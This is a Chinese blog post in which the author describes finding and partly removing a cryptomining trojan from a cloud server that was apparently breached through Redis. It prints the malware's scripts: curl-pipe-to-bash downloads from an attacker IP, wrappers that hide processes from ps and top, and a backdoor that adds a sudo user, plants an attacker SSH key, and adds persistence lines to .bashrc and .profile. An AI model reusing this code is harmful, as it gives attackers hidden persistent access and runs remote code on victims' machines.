阿里云云服务器被恶意纂改挖矿

最新推荐文章于 2024-09-10 20:00:52 发布
最新推荐文章于 2024-09-10 20:00:52 发布
阅读量1.6k 收藏 7
点赞数 2
文章标签: linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heguu/article/details/123235987
版权
本文记录了一次在实验室遇到的病毒感染,作者详细描述了如何通过top、crontab、chattr等工具追踪到隐藏的定时任务,涉及恶意脚本修改系统进程和SSH密钥的植入。最后虽然未完全解决问题,但揭示了木马通过Redis入侵的途径。
摘要由CSDN通过智能技术生成

高高兴兴来实验室学习,结果

请添加图片描述

top和ps查看进程,无异常(原因是top指令被纂改)

请添加图片描述

查看定时任务

crontab -l
lanigiro

发现一个定时任务,我从来没设置过定时任务[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EvrNJxWn-1646213868845)(面对木马,输的很彻底/img/1646212762807.png)]

修改定时任务

crontab -e

修改失败

删除该定时任务

crontab -r

删除失败

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ylG1Y1Hh-1646213868846)(面对木马,输的很彻底/img/1646209272600.png)]

原因是被锁定了

解锁

chattr -ai /var/spool/cron/root

解锁失败,chattr被病毒删了

下载chattr.c

下载chattr.c https://github.com/posborne/linux-programming-interface-exercises/blob/a93a73842cac2143c873d78a30df5f8f32f5dab8/15-file-attributes/chattr.c

编译 ,生成a.out

cc chattr.c

-bash-4.2# cc chattr.c
-bash-4.2# ls
a.out  backup  chattr.c  clamav-0.104.2.linux.x86_64.rpm  disk.pl  Recycle_bin  server  swap  wwwlogs  wwwroot
-bash-4.2#

改名

mv a.out chattr

运行

./chattr

放回原处

mv chattr /usr/bin/

停止定时任务

解锁

chattr -ai /var/spool/cron/root

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5QyHAotI-1646213868847)(面对木马,输的很彻底/img/1646209501828-1646213688509.png)]

查看锁

lsattr /var/spool/cron/root

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cHANSeSy-1646213868848)(面对木马,输的很彻底/img/1646209762261.png)]

删除该定时任务

crontab -r

失败

查看 crontab配置

cat /etc/crontab

被修改啦,暂时不管,停止定时任务服务

service crond stop

查看脚本

这个定时任务的远程地址,下载脚本

#!/bin/bash
echo "ok22$(date)" >>/tmp/ok.log
export CURL_CMD="curl"
if [ -f /bin/cd1 ];then
    export CURL_CMD="/bin/cd1" 
elif [ -f /bin/cur ];then
    export CURL_CMD="/bin/cur" 
elif [ -f /bin/TNTcurl ];then
    export CURL_CMD="/bin/TNTcurl" 
elif [ -f /bin/curltnt ];then 
    export CURL_CMD="/bin/curltnt" 
elif [ -f /bin/curl1 ];then
    export CURL_CMD="/bin/curl1" 
elif [ -f /bin/cdt ];then
    export CURL_CMD="/bin/cdt" 
elif [ -f /bin/xcurl ];then
    export CURL_CMD="/bin/xcurl"  
elif [ -x "/bin/cdz" ];then
    export CURL_CMD="/bin/cdz"
fi 
sh_url="http://104.192.82.138/s3f1015"  
export MOHOME=/var/tmp/.crypto/...
if [ -f ${MOHOME}/.ddns.log ];then
    echo "process possible running"
    current=$(date +%s)
    last_modified=$(stat -c "%Y" ${MOHOME}/.ddns.log)
    if [ $(($current-$last_modified)) -gt 6 ];then
        echo "process is not running"
    else 
        ${CURL_CMD} -fsSL -o ${MOHOME}/.ddns.pid ${sh_url}/m/reg0.tar.gz
        exit 0
    fi
fi
if [ "$(id -u)" == "0" ];then
    ${CURL_CMD} -fsSL ${sh_url}/c/ar.sh |bash
else
    ${CURL_CMD} -fsSL ${sh_url}/c/ai.sh |bash
fi

发现另一个地址http://104.192.82.138/s3f1015,下载脚本,打开

发现ps和top被修改

export PS_CMD="/bin/ps"
pssize=$(ls -l /bin/ps | awk '{ print $5 }') 
${CHATTR} -i /bin/ps
if [ ${pssize} -le 8000 ];then 
    ps_name=$(awk '/$@/ {print $1}' /bin/ps)  
    if [ ! "${ps_name}" = "ps.lanigiro" ];then
        mv /bin/${ps_name} /bin/ps.lanigiro
    fi
else 
    mv /bin/ps /bin/ps.lanigiro 
fi 
echo "#!/bin/bash">/bin/ps
echo "ps.lanigiro $@ | grep -v 'ddns|httpd'" >>/bin/ps 
touch -d 20160825 /bin/ps
chmod a+x /bin/ps
${CHATTR} +i /bin/ps  
if [ -x /bin/ps.lanigiro ];then
    PS_CMD="/bin/ps.lanigiro"
fi
topsize=`ls -l /bin/top | awk '{ print $5 }'`
${CHATTR} -i /bin/top
if [ ${topsize} -le 8000 ];then  
    top_name=$(awk '/$@/ {print $1}' /bin/top)
    if [ ! "${top_name}" = "top.lanigiro" ];then
        mv /bin/${top_name} /bin/top.lanigiro
    fi
else 
    mv /bin/top /bin/top.lanigiro
fi
echo "#!/bin/bash">/bin/top 
echo "top.lanigiro $@ | grep -v 'ddns|httpd'">>/bin/top 
chmod a+x /bin/top
touch -d 20160716 /bin/top
${CHATTR} +i /bin/top

使用top被修改后的top.lanigiro,发现挖矿的进程 .ddns

top.lanigiro

请添加图片描述

查看进程文件位置,(ps被纂改成ps.lanigiro)

ps.lanigiro -ef | grep 539

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y2F7crqp-1646213868850)(面对木马,输的很彻底/img/1646211710714.png)]

进入对应文件夹删除全部文件,删不掉的使用

chattr -ai xxxx

(忘了截图了)

杀死对应进程

kill 539

查看脚本,似乎添加了很多文件,不知道有啥用,全删了

makesshaxx(){  
    RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs= root@pending.com"
    ${CHATTR} -ia /etc/passwd;  
    grep -q lsb /etc/passwd || echo 'lsb:x:1000:1000::/home/lsb:/bin/bash' >> /etc/passwd
    ${CHATTR} +ia /etc/passwd
    ${CHATTR} -ia /etc/shadow
    grep -q "lsb:$6$4E4W/nnk" /etc/shadow  || echo 'lsb:$y$j9T$4mqDHpJ8b4riHWm2FfUHY.$./.VlnKhJMI/hj8f8sxbqhIal0jKhPxjyHxB6ZGtUm6:18849:0:99999:7:::' >> /etc/shadow
    ${CHATTR} +ia /etc/shadow
    ${CHATTR} -ia /etc/sudoers  
    grep -q lsb /etc/sudoers || echo 'lsb ALL=(ALL:ALL) ALL' >> /etc/sudoers
    ${CHATTR} +i /etc/sudoers

    mkdir /home/lsb/.ssh/ -p  
    ${CHATTR} -ia /home/lsb/.ssh/authorized_keys
    touch /home/lsb/.ssh/authorized_keys  
    chmod 600 /home/lsb/.ssh/authorized_keys
    grep -q root@pending.com /home/lsb/.ssh/authorized_keys || echo $RSAKEY > /home/lsb/.ssh/authorized_keys
    ${CHATTR}  +ia /home/lsb/.ssh/authorized_keys

    ${CHATTR} -ia /home/lsb/.ssh/authorized_keys2
    touch /home/lsb/.ssh/authorized_keys2  
    chmod 600 /home/lsb/.ssh/authorized_keys2  
    grep -q root@pending.com /home/lsb/.ssh/authorized_keys2 || echo $RSAKEY > /home/lsb/.ssh/authorized_keys2
    ${CHATTR} +ia /home/lsb/.ssh/authorized_keys2

    mkdir /root/.ssh/ -p  
    ${CHATTR} -ia /root/.ssh/authorized_keys
    touch /root/.ssh/authorized_keys  
    chmod 600 /root/.ssh/authorized_keys 
    grep -q root@pending.com /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys
 
    ${CHATTR} +ia /root/.ssh/authorized_keys

    ${CHATTR} -ia /root/.ssh/authorized_keys2
    touch /root/.ssh/authorized_keys2
    chmod 600 /root/.ssh/authorized_keys2   
    grep -q root@pending.com /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2
    ${CHATTR} +ia /root/.ssh/authorized_keys2
    for f in $(ls /home)
    do 
        if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.profile > /dev/null;then
            echo "{" >> /home/${f}/.profile
            echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.profile
            echo "} > /dev/null 2>&1" >> /home/${f}/.profile
        fi  
        if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.bashrc > /dev/null;then
            echo "{" >> /home/${f}/.bashrc
            echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.bashrc
            echo "} > /dev/null 2>&1" >> /home/${f}/.bashrc
        fi  
    done 
    
    if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.profile > /dev/null;then
        echo "{" >> /root/.profile
        echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.profile
        echo "} > /dev/null 2>&1" >> /root/.profile
    fi  
    if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.bashrc > /dev/null;then
        echo "{" >> /root/.bashrc
        echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.bashrc
        echo "} > /dev/null 2>&1" >> /root/.bashrc
    fi 
}

使用宝塔界面删。。方便找
请添加图片描述

将命令替换回来

cd /usr/bin
chattr -ai ps
mv ps.lanigiro ps

chattr -ai top
mv top.lanigiro top

chattr -ai pstree
mv pstree.lanigiro pstree

到此为止,不完美解决,crontab定时功能没法用了,对我来说并不是很重要,所以。。。

请添加图片描述

查阅资料,发现该木马从redis中进来的,只要开启远程访问,密码较弱就有可能被侵入。这次输的很彻底。

何顾长安
关注
linux文件扩展属性的源文件chattr.c
02-26
linux文件扩展属性的源文件chattr.c,下载后只需要执行gcc chattr.c -o chattr.out即可编译出chattr.out文件,从而执行./chattr.out -i a.txt等命令来对文件扩展属性进行更好的操作。 详情见文章:https://dingdong.blog.csdn.net/article/details/129227812
阿里云如何完全卸载阿里云盾(安骑士)并屏蔽阿里云盾IP
夜未至
01-12 2213
最后检查下自己服务器上的阿里云盾是否卸载干净了,主要就是看进程里有没有阿里云盾的相关进程了(AliYunDun、aliyun-service和AliYunDunUpdate),可以通过。阿里云盾(AliYunDun),又名阿里云安骑士,是阿里云自带的云监控软件,自动帮你监控阿里云服务器或者轻量应用服务器的状态,以及监控你的服务器是否有违规进程,给你发送警告邮件。为什么买了服务器之后明明什么都没有配置,阿里云却会给你推送服务器的危险消息?来检查,如果没有相关进程则说明阿里云盾已经卸载干净了。
关于我的阿里云服务器被入侵 - 分析报告
最新发布
weixin_60033897的博客
09-10 1854
因为是第一次租云服务器,所以出现了很多的问题,最严重的就是安全问题了,而且问题还是很多的。因为黑客会用各种方式入侵你的服务器,来使用你的服务器资源挖矿,或者获取你服务器的信息,甚至将你的数据锁住来让你给他转账。这些问题真的防不胜防,身为一个程序员,在进行项目开发的时候,首先要考虑的就是安全问题,接下来我将以时间线来叙述我遇到的安全问题,以及怎么提防。
Lunix chattr命令被篡 导致root无法编辑文件
baidu_38662087的博客
11-08 1736
Lunix服务器的chattr命令失效,导致root也不能编辑某些文件,需要重装chattr解除限制
Liunx服务器挖矿病毒杀除
乂夜秋风的博客
12-26 331
核心 找到服务器中的病毒程序,并彻底清除 现象(出现以下现象多半是中了挖矿木马) 1.服务器卡顿,程序跑不动 2.top 显示sshd -D占用cpu 3.服务器cpu拉满 杀除 1.top 查看该程序的信息 2.查找该程序所在的目录 3.查看该文件的属性 lsattr ‘sshd -D’ ***这里一般是ia两个,i表示这个文件连root用户都不能编辑,需要修chattr文件 4.修chattr文件(一般chattr文件都会被黑客篡导致你不能修,需要重新编译) 1)下载chattr源码重
处理挖矿病毒
lishuailing123的博客
09-25 167
通过查看相关的内容,原因为阿里云的此安全组开放了所有端口,并且这台中毒的机器上有公网IP,启动的应用端口被扫描到,通过redis的漏洞,对服务器进行攻击。【完成】
STM32+ESP8266连阿里云
07-30
在连接阿里云时,需要使用安全证书进行SSL/TLS加密,以保护数据传输不被窃取或篡。STM32和ESP8266都有支持SSL/TLS的库,如BearSSL for STM32和arduino-ssl/mbedtls for ESP8266。 最后,实际应用中可能需要考虑...
基于STM32的阿里云物联网
08-27
在本文中,我们将深入探讨如何将STM32微控制器与阿里云物联网平台相结合,构建一个高效、可靠的物联网(IoT)解决方案。STM32是由意法半导体(STMicroelectronics)推出的基于ARM Cortex-M内核的微控制器系列,因其性能...
阿里云ctf比赛writeup
04-26
而在`bypassIt II`中,问题在于`fastjson`库,攻击者需要找到一种方法绕过安全检查,可能通过重写`POJONode`的`whitereplace`方法来避免数据被篡。示例代码展示了如何利用Jackson库进行序列化操作。 2. Misc: -...
阿里云DDNS解析
02-27
1. **动态IP检测**:程序会周期性检查用户的公网IP地址,如果发现变化,就会自动更新阿里云DNS服务器上的对应记录。 2. **配置文件编辑**:在使用前,用户需要通过解压工具打开jar包,找到并编辑配置文件。配置文件...
阿里云短信服务 php版本
10-28
签名是阿里云API调用的安全机制,用于防止请求被篡。在`SignatureHelper.php`文件中,开发者通常会编写一个函数来生成这个签名。签名生成通常遵循以下步骤: - **步骤1:设置参数**:首先,需要将所有请求参数...
服务器被挂病毒记录(redis入侵)
只会写bug的靓仔的博客
07-24 608
今天正在快乐的打着游戏,突然一个浙江的电话:好家伙,我那可怜的1核2g的服务器说在跑挖矿程序,苍天啊,大地呀,我那1核2g的服务器有啥跑呢,别难为这小家伙了。
chattr没有权限 ——netstat没有权限
weixin_45386898的博客
05-16 627
服务器又被黑了吧 1、先下载C文件(https://github.com/posborne/linux-programming-interface-exercises/blob/master/15-file-attributes/chattr.c),上传到服务器的任意目录 2、编译,cc chattr,得到文件a.out,把名字成chattr 3、运行编译好的文件,把被篡的文件去掉不可修的隐藏属性,./chattr -ia /usr/bin/chattr 4、再把编译好的文件,放回/usr/bin/
服务器挖矿病毒解决ponscan,定时任务解决
认真!
04-11 1211
挖矿病毒会隐藏chattr的操作权限,让我们无法删除病毒文件,杀掉病毒进程。所以要去下载chattr.c的文件,编译成a.out。然后再对原来的chattr文件的权限进行修。进入到/var/spool/cron目录查看文件权限,发现被加了保护,使用lsattr去除,再编辑删除内容即可。命令可以帮助管理员或用户查看文件的这些特殊属性,以了解文件的状态和行为限制。使用新的chattr文件修被锁住的chattr。(不可压缩)等,每个属性都代表了文件或目录的特定限制或行为。的属性,而不是目录中的文件。
Linux服务器挖矿及解决办法
qq_40939094的博客
01-08 2701
记录一次Linux服务器挖矿的经历(chattr文件权限被)及解决办法 服务器被人挖矿,用sudo权限删除可疑进程后,发现有几个文件始终不能被具有sudo权限的用户删除。上网查找发现,这几个文件的属性被chattr文件(默认路径/usr/bin),这里分两种情况: 一般情况 采用lsattr文件查看不能删除文件(例如temp.txt)的属性 lsattr temp.txt 得到如下结果 该temp.txt文件被增加了属性i,因此不能被具有sudo权限的用户删除。采用chattr文件去除该属性后,即能
学习Linux须知1.1之Linux属性、权限,以及解决你没有权限操作此文件
伟庭的博客
05-24 3578
学习Linux须知1.1之Linux属性、权限,以及解决你没有权限操作此文件
chattr源码
loveqqcc的博客
10-20 636
/* Name chattr - change file attributes on a Linux file system Synopsis chattr [ mode ] files… Description chattr changes the file attributes on a Linux file system. The format of a symbolic mode is ±=[acdeijstuADST]. The operator ‘+’ causes the selecte
centos8 处理挖矿程序攻击
Wangthebest的专栏
05-30 1463
ll /usr/bin/top* top命令被修,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装。 yum remove e2fsprogs #rpm -qa|grep e2fsprogs yum -y install e2fsprogs #yum install e2fsprogs-1.45.6-2.el8.x86_64 解锁TOP文件并恢复 chattr -i top mv top top.rm mv top.lanigiro top 4.
authorized_keys无法删除(chattr命令被篡)
qq_37705525的博客
06-05 1900
例如:某天你心情好,突然将 /etc/shadow 这个重要的密码记录文件给他配置成为具有 i 的属性,那么过了若干天之后, 你突然要新增使用者,却一直无法新增!known_hosts的作用就很明显了,known_hosts的作用就是记录你曾经远程连接过的机器信息。如果远程机器信息不变,则直接连接,如果变了ssh就会问你一下,小子,你还连不连了?并且这个文件还被设置了隐藏属性i,导致无法修,无法删除。们刚刚连接的服务器的信息(如果以前就存在known_hosts,则会发现多了刚刚连接的服务器的信。
阿里云点播服务集成简易DEMO展示
阿里云视频点播服务提供了多项安全措施来帮助开发者保护其内容不被非法使用。 7. 开发者工具与资源 阿里云提供了开发者门户,内含API文档、SDK文档、技术论坛、开发者工具等资源,方便开发者学习、实验和解决集成...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值